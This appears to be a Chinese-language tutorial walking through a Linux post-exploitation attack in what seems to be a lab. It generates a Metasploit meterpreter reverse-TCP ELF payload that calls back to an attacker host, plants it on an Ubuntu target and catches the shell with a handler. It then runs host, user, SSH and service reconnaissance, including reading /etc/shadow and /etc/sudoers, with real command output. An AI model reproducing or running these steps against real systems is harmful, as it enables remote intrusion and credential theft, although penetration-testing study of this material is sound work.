1.msf生成病毒
设置ip地址和端口,生成msfvm3.elf文件,植入要攻击的linux系统,我这里演示的是Ubuntu系统。
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f elf > msfvm3.elf
在本地机器上开启msf监听,IP地址和端口设置成病毒对应的地址端口,payload也要对应。
use exploit/multi/handler
2.拿到靶机的meterpreter
靶机上线后。获取meterpreter,输入下面python指令进入靶机终端。
shell python -c "import pty;pty.spawn('/bin/bash')"
这里不对的可以改成python3
3.常见的信息收集指令
1.主机信息
uname -a //显示主机信息
azheng@ubuntu:~/Desktop$ uname -a uname -a Linux ubuntu 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/lsb-release //查看主机系统的发行版本
root@ubuntu:~# cat /etc/lsb-release cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=18.04 DISTRIB_CODENAME=bionic DISTRIB_DESCRIPTION="Ubuntu 18.04.1 LTS"
cat /proc/version //查看内核
cat /proc/version Linux version 4.15.0-29-generic (buildd@lgw01-amd64-057) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
ps -all //查看系统进程
azheng@ubuntu:~/Desktop$ ps PID TTY TIME CMD 19894 pts/1 00:00:00 bash 20345 pts/1 00:00:00 msfvm3.elf 20401 pts/1 00:00:00 sh 20402 pts/1 00:00:00 python3 20513 pts/1 00:00:00 ps
kill //结束进程
azheng@ubuntu:~/Desktop$ kill -9 -20513 //-9 强制结束 -20513 进程号
top //显示当前处理器活动和任务
azheng@ubuntu:~/Desktop$ top top - 09:57:47 up 23:43, 2 users, load average: 0.00, 0.00, 0.00 Tasks: 307 total, 1 running, 235 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st KiB Mem : 4015692 total, 212900 free, 1408804 used, 2393988 buff/cache KiB Swap: 969960 total, 969692 free, 268 used. 2301292 avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 588 root 20 0 110508 3536 3152 S 0.3 0.1 0:06.56 irqbalance 1380 gdm 20 0 405816 22564 6576 S 0.3 0.6 5:56.92 Xwayland 120599 azheng 20 0 44224 3996 3180 R 0.3 0.1 0:00.09 top 1 root 20 0 225760 9768 6916 S 0.0 0.2 0:08.68 systemd 2 root 20 0 0 0 0 S 0.0 0.0 0:00.02 kthreadd 4 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kworker/0:0H 6 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 mm_percpu_wq 7 root 20 0 0 0 0 S 0.0 0.0 0:00.92 ksoftirqd/0 8 root 20 0 0 0 0 I 0.0 0.0 0:01.83 rcu_sched 9 root 20 0 0 0 0 I 0.0 0.0 0:00.00 rcu_bh 10 root rt 0 0 0 0 S 0.0 0.0 0:00.04 migration/0 11 root rt 0 0 0 0 S 0.0 0.0 0:00.14 watchdog/0 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 14 root rt 0 0 0 0 S 0.0 0.0 0:00.15 watchdog/1
netstat -anltup //查看网络状态
root@ubuntu:~# netstat -anltup Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101750/systemd-reso tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 31597/sshd tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 117693/cupsd tcp 0 0 127.0.0.1:6010 0.0.0.0:* LISTEN 19864/sshd: azheng@ tcp 0 0 192.168.94.130:22 192.168.94.1:45483 ESTABLISHED 19762/sshd: azheng tcp 0 0 192.168.94.130:55760 185.125.188.54:443 ESTABLISHED 2373/snapd tcp 0 208 192.168.94.130:22 192.168.94.1:45482 ESTABLISHED 19760/sshd: azheng tcp 0 0 192.168.94.130:58612 192.168.94.128:6666 ESTABLISHED 20345/./msfvm3.elf tcp6 0 0 :::22 :::* LISTEN 31597/sshd tcp6 0 0 ::1:631 :::* LISTEN 117693/cupsd
ifconfig -a //查看网卡信息
hostname //查看主机名称
2.用户信息
w //查看用户信息
azheng@ubuntu:~/Desktop$ w 09:59:25 up 23:44, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT azheng :0 :0 Mon10 ?xdm? 2:23 0.00s /usr/lib/gdm3/gdm-x-session azheng pts/1 192.168.xx.x Mon10 0.00s 5.16s 0.00s w
whoami //显示当前用户
last //查看最近的登录信息
azheng@ubuntu:~/Desktop$ last azheng pts/1 192.168.xx.x Mon Oct 9 10:53 still logged in azheng pts/1 192.168.xx.x Mon Oct 9 10:35 - 10:49 (00:13) azheng :0 :0 Mon Oct 9 10:22 still logged in wtmp begins Mon Oct 9 10:22:49 2023
cat /etc/passwd //查看用户信息数据库
cat /etc/shadow //查看用户密码数据库
cat /etc/sudoers //查看sudo命令的使用规则
# User privilege specification root ALL=(ALL:ALL) ALL # Members of the admin group may gain root privileges %admin ALL=(ALL) ALL # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL # See sudoers(5) for more information on "#include" directives: #includedir /etc/sudoers.d
sudo -l //列出用户可执行指令
root@ubuntu:~# sudo -l Matching Defaults entries for root on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User root may run the following commands on ubuntu: (ALL : ALL) ALL
3.ssh信息
cat /etc/ssh/sshd_config //查看服务器ssh配置信息
┌──(root㉿kali)-[~/Desktop] └─# cat /etc/ssh/sshd_config # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # This sshd was compiled with PATH=/usr/local/bin:/usr/bin:/bin:/usr/games # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options override the # default value. Include /etc/ssh/sshd_config.d/*.conf #Port 22 #AddressFamily any #ListenAddress 0.0.0.0 #ListenAddress :: #HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_ecdsa_key #HostKey /etc/ssh/ssh_host_ed25519_key # Ciphers and keying #RekeyLimit default none
cat /etc/ssh/ssh_config //查看客户端ssh配置信息
┌──(root㉿kali)-[~/Desktop] └─# cat /etc/ssh/ssh_config # This is the ssh client system-wide configuration file. See # ssh_config(5) for more information. This file provides defaults for # users, and the values can be changed in per-user configuration files # or on the command line. # Configuration data is parsed as follows: # 1. command line options # 2. user-specific file # 3. system-wide file # Any configuration value is only changed the first time it is set. # Thus, host-specific definitions should be at the beginning of the # configuration file, and defaults at the end. # Site-wide defaults for some commonly used options. For a comprehensive # list of available options, their meanings and defaults, please see the # ssh_config(5) man page. Include /etc/ssh/ssh_config.d/*.conf Host * # ForwardAgent no # ForwardX11 no # ForwardX11Trusted yes PasswordAuthentication yes
4.服务状态信息
service --status-all //+代表开启 -代表关闭
┌──(root㉿kali)-[~/Desktop] └─# service --status-all [ - ] apache-htcacheclean [ - ] apache2 [ - ] apparmor [ - ] atftpd [ - ] bluetooth [ - ] console-setup.sh [ + ] cron
cat /etc/services //查看端口和服务的映射关系
┌──(root㉿kali)-[~/Desktop] └─# cat /etc/services # Network services, Internet style # # Updated from https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml . # # New ports will be added on request if they have been officially assigned # by IANA and used in the real-world or are needed by a debian package. # If you need a huge list of used numbers please install the nmap package. tcpmux 1/tcp # TCP port service multiplexer echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp fsp 21/udp fspd ssh 22/tcp # SSH Remote Login Protocol telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver whois 43/tcp nicname
iptables -L //查看安全策略